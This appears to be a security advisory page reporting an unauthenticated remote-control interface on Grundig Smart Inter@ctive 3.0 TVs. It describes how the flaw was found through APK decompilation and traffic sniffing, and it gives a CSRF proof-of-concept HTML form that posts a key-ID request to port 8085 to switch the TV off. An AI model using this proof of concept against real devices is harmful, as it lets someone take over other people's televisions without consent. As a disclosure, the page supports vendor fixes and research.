Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

2018.07.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Grundig Smart Remote App CSRF # Google Dork: Local Vulnerability # Date: 06.07.2018 # Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16 # Vendor Homepage: https://www.grundig.com/ # Software Link: https://play.google.com/store/apps/details?id=arcelik. android.grundig.remote # Version: Grundig Smart Inter@ctive 3.0 # Tested on: Windows 7-8-10 # CVE : none Hello! I'm trying my TV.I saw a Grundig remote control application on Google Play. Computer I downloaded and decompiled APK. And I began to examine individual classes. I noticed in a class that a request was sent during operations on the command line. I downloaded the phone packet viewer and opened the control application and made some operations. And I saw that there was such a request; GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1 I noticed that each process has an id value. Then I turned off the television using the control application and noted the outgoing IDs. The only requirement for the connection between the TV and the application was to have the same IP address. After I made the IP address on the TV and the phone and the IP address on the computer the same: I accessed the interface from the 8085 port. Now I could do anything from the computer :) CSRF POC : <html> <head> <title>Grundig TV PoC</title> </head> <body> <h1>Grundig Inter@ctive 3 Shutdown PoC</h1> <form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544& keysymbol=-4081 <http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>"> <input type="submit" value="Go!"> </form> </body> </html> this poc will turn off the television when it is running. :) video about vulnerability; https://youtu.be/H7WYTkgtwsY #MoreThanYouImagine! ~ ahmeth4n.org greetz : @SmashTheKernel , @t3beq , @c_c0re

References:

https://youtu.be/H7WYTkgtwsY


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top